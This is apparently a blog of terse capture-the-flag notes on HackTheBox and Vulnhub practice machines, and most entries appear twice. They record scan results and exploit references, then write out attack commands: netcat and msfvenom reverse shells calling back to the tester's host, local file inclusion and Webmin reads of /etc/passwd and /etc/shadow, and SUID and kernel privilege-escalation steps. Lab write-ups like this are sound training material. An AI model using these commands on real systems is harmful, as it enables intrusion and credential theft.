Monday, March 30, 2020
Wednesday, October 16, 2019
HackTheBox: Legacy
source: https://www.hackthebox.eu/home/machines/profile/2
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
smb-vuln-cve2009-3103
smb-vuln-ms08-067
smb-vuln-ms17-010
ms08-067
TODO: but actually I cannot get reverse shell without the help of metasploit exploits
ms17-010 download nc.exe via FTP, then get reverse shell
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
smb-vuln-cve2009-3103
smb-vuln-ms08-067
smb-vuln-ms17-010
ms08-067
TODO: but actually I cannot get reverse shell without the help of metasploit exploits
ms17-010 download nc.exe via FTP, then get reverse shell
HackTheBox: Lame
source: https://www.hackthebox.eu/home/machines/profile/1
my ip: 10.10.14.2
10.10.10.3
10.10.10.3
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Samba 3.0.20-Debian
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687
uid=1(daemon) gid=1(daemon) groups=1(daemon)
reverse shell:
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687 --script-args=”distcc-cve2004-2687.cmd=’nc 10.10.14.2 443 -e /bin/bash’”
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 8.04"
makis:x:1003:1003::/home/makis:/bin/sh
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
my ip: 10.10.14.2
10.10.10.3
10.10.10.3
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Samba 3.0.20-Debian
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687
uid=1(daemon) gid=1(daemon) groups=1(daemon)
reverse shell:
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687 --script-args=”distcc-cve2004-2687.cmd=’nc 10.10.14.2 443 -e /bin/bash’”
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 8.04"
makis:x:1003:1003::/home/makis:/bin/sh
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
Vulnhub: pWnOS: 2.0 (Pre-Release)
source: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
change to dhcp:
init=/bin/bash
mount -o remount,rw /
vim /etc/network/interfaces
then reboot
192.168.1.8
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
maybe ubuntu 12.04
/info/
/info.php
/login/
/register
/activate
/blog
/includes
PHP Version 5.3.5-1ubuntu7
http://192.168.1.8/blog/
https://www.exploit-db.com/exploits/1191
Simple PHP Blog 0.4.0 - Multiple Remote s
perl ./1191.pl -h http://192.168.1.8/blog -e 1
perl ./1191.pl -h http://192.168.1.8/blog -e 3 -U foo -P bar
http://192.168.1.8/blog/images/cmd.php?cmd=id
reverse shell:
login, upload rs.php
http://192.168.1.8/blog/images/rs.php
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 11.04"
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
cat /var/www/mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
mysql -uroot -pgoodday -e “SHOW DATABASES”
ERROR 1045
https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
change to dhcp:
init=/bin/bash
mount -o remount,rw /
vim /etc/network/interfaces
then reboot
192.168.1.8
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
maybe ubuntu 12.04
/info/
/info.php
/login/
/register
/activate
/blog
/includes
PHP Version 5.3.5-1ubuntu7
http://192.168.1.8/blog/
https://www.exploit-db.com/exploits/1191
Simple PHP Blog 0.4.0 - Multiple Remote s
perl ./1191.pl -h http://192.168.1.8/blog -e 1
perl ./1191.pl -h http://192.168.1.8/blog -e 3 -U foo -P bar
http://192.168.1.8/blog/images/cmd.php?cmd=id
reverse shell:
login, upload rs.php
http://192.168.1.8/blog/images/rs.php
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 11.04"
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
cat /var/www/mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
mysql -uroot -pgoodday -e “SHOW DATABASES”
ERROR 1045
https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Vulnhub: pWnOS: 1.0
source: https://www.vulnhub.com/entry/pwnos-10,33/
192.168.1.6
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
maybe ubuntu 7.10
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/index2 (Status: 200)
/index1 (Status: 200)
/index2.php (Status: 200)
/index.php (Status: 200)
/php (Status: 301)
local file inclusion:
http://192.168.1.6/index1.php?help=false&connect=../../../../etc/passwd
samba 3.0.26a
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl ./2017.pl 192.168.1.6 10000 /etc/issue 0
perl ./2017.pl 192.168.1.6 10000 /etc/passwd 0
perl ./2017.pl 192.168.1.6 10000 /etc/shadow 0
perl ./2017.pl 192.168.1.6 10000 /home/obama/.ssh/authorized_keys 0
https://github.com/g0tmi1k/debian-ssh
ssh -i ./common_keys/rsa/2048/dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.1.6
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 7.10"
https://www.exploit-db.com/exploits/8478
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation
192.168.1.6
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
maybe ubuntu 7.10
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/index2 (Status: 200)
/index1 (Status: 200)
/index2.php (Status: 200)
/index.php (Status: 200)
/php (Status: 301)
local file inclusion:
http://192.168.1.6/index1.php?help=false&connect=../../../../etc/passwd
samba 3.0.26a
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl ./2017.pl 192.168.1.6 10000 /etc/issue 0
perl ./2017.pl 192.168.1.6 10000 /etc/passwd 0
perl ./2017.pl 192.168.1.6 10000 /etc/shadow 0
perl ./2017.pl 192.168.1.6 10000 /home/obama/.ssh/authorized_keys 0
https://github.com/g0tmi1k/debian-ssh
ssh -i ./common_keys/rsa/2048/dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.1.6
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 7.10"
https://www.exploit-db.com/exploits/8478
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation
Vulnhub: SickOs: 1.2
source: https://www.vulnhub.com/entry/sickos-12,144/
192.168.1.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
maybe ubuntu 11.10/12.04
/index.php
/test/
/~sys~
curl -v -o /dev/null -s -XOPTIONS http://192.168.1.5/test/
MS-Author-Via: DAV
reverse shell:
msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=443 -f raw > rs.php
nmap -p 80 192.168.1.5 --script http-put --script-args http-put.url=’/test/rs.php’,http-put.file=’./rs.php’
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
https://www.exploit-db.com/exploits/33899
Chkrootkit 0.49 - Local Privilege Escalation
echo “chmod +s /bin/bash” > /tmp/update
192.168.1.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
maybe ubuntu 11.10/12.04
/index.php
/test/
/~sys~
curl -v -o /dev/null -s -XOPTIONS http://192.168.1.5/test/
MS-Author-Via: DAV
reverse shell:
msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=443 -f raw > rs.php
nmap -p 80 192.168.1.5 --script http-put --script-args http-put.url=’/test/rs.php’,http-put.file=’./rs.php’
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
https://www.exploit-db.com/exploits/33899
Chkrootkit 0.49 - Local Privilege Escalation
echo “chmod +s /bin/bash” > /tmp/update
Tuesday, October 15, 2019
Vulnhub: SickOs: 1.1
source: https://www.vulnhub.com/entry/sickos-11,132/
192.168.1.107
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
maybe ubuntu 11.10/12.04
gobuster dir -p http://192.168.1.107:3128 -u http://192.168.1.107 -w /usr/share/seclists/DiscoveryWeb-Content/common.txt
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/connect (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
192.168.1.107
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
maybe ubuntu 11.10/12.04
gobuster dir -p http://192.168.1.107:3128 -u http://192.168.1.107 -w /usr/share/seclists/DiscoveryWeb-Content/common.txt
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/connect (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
curl --proxy http://192.168.1.107:3128 http://192.168.1.107/robots.txt
Dissalow: /wolfcms
http://192.168.1.107/wolfcms/docs/updating.txt
v0.8.2
https://github.com/wolfcms/wolfcms/tree/0.8.2/wolf
http://192.168.1.107/wolfcms/?/admin/login
username admin, password admin
reverse shell:
upload rs.php
http://192.168.1.107/wolfcms/public/rs.php
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
cat /var/www/wolfcms/config.php
define(‘DB_USER’, ‘root’);
define(‘DB_PASS’, ‘john@123’);
ssh username sickos, password john@123
Subscribe to:
Posts (Atom)